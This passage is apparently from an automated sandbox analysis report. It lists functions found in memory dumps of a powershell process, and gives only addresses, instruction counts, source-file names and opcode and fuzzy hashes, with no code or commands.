                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 19d8f0632466b3366fc71b648b494914d48d5e2fde8302aa25b1aab000e0fc74
                                                                • Instruction ID: 6e02e429bafb2d8263d9d8c8ee4447270276cd2d76d18bd8e42b02e11e1f9e58
                                                                • Opcode Fuzzy Hash: 19d8f0632466b3366fc71b648b494914d48d5e2fde8302aa25b1aab000e0fc74
                                                                • Instruction Fuzzy Hash: 504263B4A003149FE724DF64C850BAAB7B2EF89304F10C4A9D95A6BB95CB35ED41CF91
                                                                Function 07AAD594 Relevance: .4, Instructions: 435COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 256308eef3df7d0b5432508a071a2be5feb2360dd2f8d30bd9c375833f97770e
                                                                • Instruction ID: dcb9f072a36c85576530b47db0d5c4f8cff7f7a3e11ef00ba6577c458808a156
                                                                • Opcode Fuzzy Hash: 256308eef3df7d0b5432508a071a2be5feb2360dd2f8d30bd9c375833f97770e
                                                                • Instruction Fuzzy Hash: BB122FB4A14215EFE721CF24C841FAEB7B2EB85304F408499D59AABB94CB31ED81CF51
                                                                Function 07AAD389 Relevance: .4, Instructions: 431COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d562e77072e6c2e2dd9b13867d73acdf5e97ce2fad7da2a49fe4ed86c01ebf76
                                                                • Instruction ID: 2356d88a75b8bbb179ade2d52207583b611b9b0e2007557670726c9ec4a8b16c
                                                                • Opcode Fuzzy Hash: d562e77072e6c2e2dd9b13867d73acdf5e97ce2fad7da2a49fe4ed86c01ebf76
                                                                • Instruction Fuzzy Hash: 06121EB4A14215EFE721CF14C841FAEB7B2EB85304F408499E45AABB94CB71ED81CF51
                                                                Function 09801E68 Relevance: .4, Instructions: 427COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8045d0693ddfb7a168035bfa15b4105f6901e00d122b653bbfd955f50537b42e
                                                                • Instruction ID: 35399d87cae62b94195e4725840abdbf503d9c0b7bc5b78bf3e7110e9051e44e
                                                                • Opcode Fuzzy Hash: 8045d0693ddfb7a168035bfa15b4105f6901e00d122b653bbfd955f50537b42e
                                                                • Instruction Fuzzy Hash: FC023A74A00209DFDB45CF98D894A9EBBB2FF88320F248159E915EB3A1C771EC51CB90
                                                                Function 09802428 Relevance: .4, Instructions: 425COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a5d2497c7464115d6f43537cd2069098a09a363a5b939a34ac2874fce6c57efa
                                                                • Instruction ID: f19d079022096660528f39bd8f5992c6dd255822bd088d6563e3fcba78064886
                                                                • Opcode Fuzzy Hash: a5d2497c7464115d6f43537cd2069098a09a363a5b939a34ac2874fce6c57efa
                                                                • Instruction Fuzzy Hash: ED024E74A01219DFDB55CF98D894A9EBBB2FF88310F248159E815EB3A5C771EC81CB90
                                                                Function 098014A0 Relevance: .4, Instructions: 402COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f4e2457f939e965e3bc56bd1b2bc73f2923184a5769108eaf36bd7760443d472
                                                                • Instruction ID: 8f95d64489b8475183ebd33d4baf742bf82c0d367c9bf85e866cfec4f546840a
                                                                • Opcode Fuzzy Hash: f4e2457f939e965e3bc56bd1b2bc73f2923184a5769108eaf36bd7760443d472
                                                                • Instruction Fuzzy Hash: 49023C74A052099FDB55CF98D894A9DBBF2FF88320F648159E815EB3A5C731EC81CB90
                                                                Function 07AA644C Relevance: .4, Instructions: 391COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a5a978dffe4cedcf1e5e14b9027bed836ffe3d3e051df28b68c1f5081dda0de
                                                                • Instruction ID: fdd3aa693de157e5a9877833388a1b8e33fb6d9c4c3bdc7c036391a5443b9296
                                                                • Opcode Fuzzy Hash: 7a5a978dffe4cedcf1e5e14b9027bed836ffe3d3e051df28b68c1f5081dda0de
                                                                • Instruction Fuzzy Hash: 4FF168B4B11201AFDB04CF98D451EA9BBB2EF89304F19C059E915AB791CB72ED41CF61
                                                                Function 07AA4548 Relevance: .4, Instructions: 382COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 958b8a5a3eda17e690e344a70b9525b1c8b8feba0b98fc6fa640410b4bbbc1cd
                                                                • Instruction ID: 38d89b1fd8d09157608836dbd0e1ad9a91d7c3179586770fa76c644780dbb5ba
                                                                • Opcode Fuzzy Hash: 958b8a5a3eda17e690e344a70b9525b1c8b8feba0b98fc6fa640410b4bbbc1cd
                                                                • Instruction Fuzzy Hash: 9CE167B0B00245AFE714DF9CD540B6ABBB2AFC9305F15C069E9159B791CBB2EC42CB91
                                                                Function 0980051F Relevance: .4, Instructions: 374COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ca53ab32c3a9fd79c53446042fd44152339a063f607c4feaa2fff43d6588195a
                                                                • Instruction ID: c386eeda136f8e247de85807f5b2f466540f3a3b38370c18348c40d88b24bc60
                                                                • Opcode Fuzzy Hash: ca53ab32c3a9fd79c53446042fd44152339a063f607c4feaa2fff43d6588195a
                                                                • Instruction Fuzzy Hash: 65D1B1319093C18FD7179F74D8642997FB1AFC2215B1A40DBC481DF2A3DB39894ACBA2
                                                                Function 07AA8068 Relevance: .4, Instructions: 373COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cf13982faffc8a1c38adffe5f85bf85c6ba8422f3bc27d5ee512cdf35dc41db3
                                                                • Instruction ID: 533ce0c838b523ddfe840fa65c1704cb9e87f4348aa34b384cd56b61eb0434b3
                                                                • Opcode Fuzzy Hash: cf13982faffc8a1c38adffe5f85bf85c6ba8422f3bc27d5ee512cdf35dc41db3
                                                                • Instruction Fuzzy Hash: C7E1ADB4B10204AFDB18DF68C450BAEBBB2AFC9304F14C429D9156F795CB39EC418BA1
                                                                Function 07AA452C Relevance: .4, Instructions: 362COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 83fcc6453699b0764a31f1ce97146035f7fbbf137f774ad411484c6ded0db598
                                                                • Instruction ID: 8cdc3b031a10c12dbb09dd20dd7d65ba8ae64b600d4de41afa9166f0f2e86d01
                                                                • Opcode Fuzzy Hash: 83fcc6453699b0764a31f1ce97146035f7fbbf137f774ad411484c6ded0db598
                                                                • Instruction Fuzzy Hash: 6BE159B4A00246AFDB10CF98D550FAABBB2EFC9315F15C059E915AB391C7B2EC41CB91
                                                                Function 09800B80 Relevance: .3, Instructions: 339COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e0d946f950f2c1a2ee1c41f18bf097db8e12f923cc6d2e0e7cbe0477700b6ec7
                                                                • Instruction ID: e303a0ca617b107221c9af1d73e8d6dc425b6c0223884e51f7d2b720c6ba930a
                                                                • Opcode Fuzzy Hash: e0d946f950f2c1a2ee1c41f18bf097db8e12f923cc6d2e0e7cbe0477700b6ec7
                                                                • Instruction Fuzzy Hash: BFE10875A012099FDB55CF98D894BADBBB2FF88310F248159E809EB391C735ED81CB90
                                                                Function 07AA8043 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d6c42d150420202f09f34721cc7b1528110be030f76f575a9cb5722d4808d57c
                                                                • Instruction ID: 108ee502fda316add24fbb0a8aef78c8099cb1c30bf086d1a095db5a5af505f2
                                                                • Opcode Fuzzy Hash: d6c42d150420202f09f34721cc7b1528110be030f76f575a9cb5722d4808d57c
                                                                • Instruction Fuzzy Hash: 7FC19CB4A10305AFDB19CF54C840BAEBBB2AF89304F14C46AD9156F795CB39EC45CBA1
                                                                Function 07AA8C80 Relevance: .2, Instructions: 228COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9421bc76a0470495642b0820c34a9559107a39a270ffd37d1e3507f1a975ac9d
                                                                • Instruction ID: ec29fd1e508a2da0d1ab008956da7ef64d616cf3cb75e09e3ba2557d6ba4abd2
                                                                • Opcode Fuzzy Hash: 9421bc76a0470495642b0820c34a9559107a39a270ffd37d1e3507f1a975ac9d
                                                                • Instruction Fuzzy Hash: 5B715AF1710306EFCB269F2888007AABBB2EFD5211F14847AD526CB641EB3DD941C791
                                                                Function 09800564 Relevance: .2, Instructions: 224COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce5546ba96681659b37b82337006c01162cd5862d1404db5617a51075927871b
                                                                • Instruction ID: ce57e18a3539f9ab09b2bcd8a4fc98ad84215fa8c1b8eb657f7459b9cf1ad788
                                                                • Opcode Fuzzy Hash: ce5546ba96681659b37b82337006c01162cd5862d1404db5617a51075927871b
                                                                • Instruction Fuzzy Hash: B7816A6280E3C15FD3179B7898793953FB0AF93255B1A00DBC0D1CF1B3E669894AC7A6
                                                                Function 098007C8 Relevance: .2, Instructions: 216COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1cab27292f1c8132541ae182f81d0a8191fc8ca8d29daa7ac332fbde3f1e8571
                                                                • Instruction ID: 70bb7b2a3197b15437d45298def79bf68dbd6b8f605bef566ee28bb0f22410bd
                                                                • Opcode Fuzzy Hash: 1cab27292f1c8132541ae182f81d0a8191fc8ca8d29daa7ac332fbde3f1e8571
                                                                • Instruction Fuzzy Hash: 86817B35B002198FDB54DFA8D850BAEB7B6FFC8200F148569E809DB395DB359C06CBA1
                                                                Function 0981157D Relevance: .2, Instructions: 206COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781160629.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6f138ae00535fffc0948d0ad287fe057f045afd405a4853009933e36ca5fac79
                                                                • Instruction ID: 6e51a3085fa41845af3d31fc8bc0280b360daf3dcbe53ea9f38b2e1df13b8e92
                                                                • Opcode Fuzzy Hash: 6f138ae00535fffc0948d0ad287fe057f045afd405a4853009933e36ca5fac79
                                                                • Instruction Fuzzy Hash: F2816AB4A19204DFDB14CF44C588EA9BBB6EF99314F18C09AE905AB755CB32EC41CF50
                                                                Function 098029B1 Relevance: .1, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc5deab97976f4e10248e9a141797bf100f4d1faaf081ee16582f2abd5772209
                                                                • Instruction ID: febf0e85a9f798f4568ae76cf54478f713f1abe2de46afea6898b34923b61bd7
                                                                • Opcode Fuzzy Hash: fc5deab97976f4e10248e9a141797bf100f4d1faaf081ee16582f2abd5772209
                                                                • Instruction Fuzzy Hash: 20515430A006059FCB55CF5CC8A5AAEBBB2FF89310F248559E925EB3A5C735EC52CB50
                                                                Function 098023E1 Relevance: .1, Instructions: 139COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ccf96492a4c6b07c05bf7e9682ee4d3a4562eec0f7498ab5bd9551966070725f
                                                                • Instruction ID: 5a91045d2dbdacda0b04e030d59ee11bfdfd03733e3b1e78f6f3b8a3addee72a
                                                                • Opcode Fuzzy Hash: ccf96492a4c6b07c05bf7e9682ee4d3a4562eec0f7498ab5bd9551966070725f
                                                                • Instruction Fuzzy Hash: B9517D34A016458FCB45CF5CC8A4AAEBBB1FF89310F648199E925EB3A5C335EC51CB94
                                                                Function 09801E22 Relevance: .1, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46002c12ee42462f699b2ff8137716b1658e00e9c4e295970af0ae3d2653a93e
                                                                • Instruction ID: 820cb440e21b03542371a1ddcd3bc3e1456121a6d6c9c5367c7109c551b06f0c
                                                                • Opcode Fuzzy Hash: 46002c12ee42462f699b2ff8137716b1658e00e9c4e295970af0ae3d2653a93e
                                                                • Instruction Fuzzy Hash: AC517F75A046099FCB45CF5CC894AAEBBB2FF88324F248259E915E73A1C735EC51CB90
                                                                Function 098029D0 Relevance: .1, Instructions: 127COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 112698d360d6bb2aa4d57fd07821f49e8b73336f64ccad5b359831d34d728773
                                                                • Instruction ID: ca94efc31a838dbe1d20591b137ab1887af684a7529d7095437500557caa4b6f
                                                                • Opcode Fuzzy Hash: 112698d360d6bb2aa4d57fd07821f49e8b73336f64ccad5b359831d34d728773
                                                                • Instruction Fuzzy Hash: 05512D70A106099FCB55CF9CC895AAEF7B2FF88310B248659E925E73A4C735EC51CB90
                                                                Function 098029E0 Relevance: .1, Instructions: 127COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ddea7d65748caa6958857e8f0c9a2fbcf53ac6dd8e3b5e41e32c94550baed587
                                                                • Instruction ID: 120a7dafbb62dfc3ef140184e5bbbe60d38936fe597ba6789b854852dceab460
                                                                • Opcode Fuzzy Hash: ddea7d65748caa6958857e8f0c9a2fbcf53ac6dd8e3b5e41e32c94550baed587
                                                                • Instruction Fuzzy Hash: 37513F30A006099FCB55CF5CC895AAEF7B2FF88310B248559E925E7395C735EC52CB90
                                                                Function 07AA3E00 Relevance: .1, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e1a02cd26bc2dab05dafab50a3d2c37edd2c9d2639bcdf2025f84b552f7b727c
                                                                • Instruction ID: 35b08a39f8b54f85585ef0da34b354fbbfe2569bf4e7068fbe40afab03c7f70f
                                                                • Opcode Fuzzy Hash: e1a02cd26bc2dab05dafab50a3d2c37edd2c9d2639bcdf2025f84b552f7b727c
                                                                • Instruction Fuzzy Hash: CE4127B2B10216EBCF249B69D80026EF7F5AFD4211B14846AD926EB240EB31D901D7E1
                                                                Function 09800E87 Relevance: .1, Instructions: 117COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4cb5e358018c9a7bbedc6534b20e25fcc3b51ad880c4e19a01eb10db90e6060b
                                                                • Instruction ID: c1e3103cd32d28491f60b4ea0ee9b075044050269a10f25567798ecfd80d219c
                                                                • Opcode Fuzzy Hash: 4cb5e358018c9a7bbedc6534b20e25fcc3b51ad880c4e19a01eb10db90e6060b
                                                                • Instruction Fuzzy Hash: 9B51EA34A002099FDB45CF98D894B9DFBB2FF88314F248559E804AB3A5C735ED82DB50
                                                                Function 09801490 Relevance: .1, Instructions: 117COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b9d1e52212efa8fe86a3ba3c37a3f562264f17fbfcc297c4cedb0509ed5edda3
                                                                • Instruction ID: 86a178c1338c950a9f459c8255c83c16b8ef02fa4a74b87097c254bd1fa2eb8b
                                                                • Opcode Fuzzy Hash: b9d1e52212efa8fe86a3ba3c37a3f562264f17fbfcc297c4cedb0509ed5edda3
                                                                • Instruction Fuzzy Hash: 8F411974A046059FCB48CF98C8949AEB7B2BF89320B248259E915EB390D335EC41CB90
                                                                Function 09802417 Relevance: .1, Instructions: 115COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e5b2a6dbad0ab551597980e86749a22e6de03a4fa604050be75909ec8af8e53
                                                                • Instruction ID: 45828fbfdc33305465260e4d80920b47ae30fa09ea87ab25d77a40dc52e90c86
                                                                • Opcode Fuzzy Hash: 2e5b2a6dbad0ab551597980e86749a22e6de03a4fa604050be75909ec8af8e53
                                                                • Instruction Fuzzy Hash: 54412A74A016099FCB45CF5CC8A4AAEB7B1FF88314F648258E925E73A5C335EC51CB94
                                                                Function 09801E57 Relevance: .1, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 475221f94c2b2f5cd025f95103c4eb79438f44e54c11dcbe193ee009989fcb02
                                                                • Instruction ID: 70b1b161fb5f3c66e658c8abd362ffeddd54c8295e1fbc17de6fa0b742a6891c
                                                                • Opcode Fuzzy Hash: 475221f94c2b2f5cd025f95103c4eb79438f44e54c11dcbe193ee009989fcb02
                                                                • Instruction Fuzzy Hash: 7F411D75A046099FCB54CF58C894AAEFBF2FF88324B248258E915E73A4D735EC51CB90
                                                                Function 07AA8508 Relevance: .1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2b41d0af2b17e13572e04530705f527368211b07cfb8bcc709c7e438bff5be17
                                                                • Instruction ID: 87136ef219e284d03e687a9e20fdf2eb7638ba5909c63a2861cb3f14ae471a72
                                                                • Opcode Fuzzy Hash: 2b41d0af2b17e13572e04530705f527368211b07cfb8bcc709c7e438bff5be17
                                                                • Instruction Fuzzy Hash: A5319C74B10204AFE7049F64C811BAEB7A3AFC5705F14C029E9166FB91CF7A9C018BA6
                                                                Function 09811230 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781160629.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1260dc24a96c9934c897fe3a5958684255d2f09563500c9b33cbd1d376ba2625
                                                                • Instruction ID: 1a6643de978df7d9e86018d80afd654b501641babb214ffb10ceefe4b9960adc
                                                                • Opcode Fuzzy Hash: 1260dc24a96c9934c897fe3a5958684255d2f09563500c9b33cbd1d376ba2625
                                                                • Instruction Fuzzy Hash: CC213BB0B08309DFDB20DE25840977D77A99F95748F15802DEB05DBB88DB39C940C392
                                                                Function 07AA3DE0 Relevance: .1, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1c517ac8dc4fa46cc9fb2b2aa2709a5db649aae8091ee89a421cd4ee99e80dcb
                                                                • Instruction ID: 6c14299dd08228af9bf5e6b66a6109976407c30491ce95905af5e4f7e9429c3b
                                                                • Opcode Fuzzy Hash: 1c517ac8dc4fa46cc9fb2b2aa2709a5db649aae8091ee89a421cd4ee99e80dcb
                                                                • Instruction Fuzzy Hash: C72137F6A04356FFCF358B28C9401AABFF0AF961107198197DC68EB242E7319904D7E1
                                                                Function 07AA8C60 Relevance: .1, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: db7681aec25996bda119089d19251a83e4b012d50072691693e911c4057ed806
                                                                • Instruction ID: 6f94d354ef90fa3df31a1c17829303f4bbc8eecf56cbabb96932b6a7c3f85d44
                                                                • Opcode Fuzzy Hash: db7681aec25996bda119089d19251a83e4b012d50072691693e911c4057ed806
                                                                • Instruction Fuzzy Hash: C021E5F4606302AFEB12DF2499007B97B71AFC6344F15406AE5219B692DB3DDA41CBA1
                                                                Function 09800B71 Relevance: .1, Instructions: 80COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a8146f5629982f3839f1bace24f719ca97ca527bf5f765dd496cb18eab1c2baa
                                                                • Instruction ID: 54a66883d39aa68f510c934cc6359e863ae0212ba7f603ced98277b689b85cb1
                                                                • Opcode Fuzzy Hash: a8146f5629982f3839f1bace24f719ca97ca527bf5f765dd496cb18eab1c2baa
                                                                • Instruction Fuzzy Hash: 7A310774A006099FCB54CF48C994AAAF7F1FF88310B248299D959EB791C736ED91CB90
                                                                Function 098131B2 Relevance: .1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781160629.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
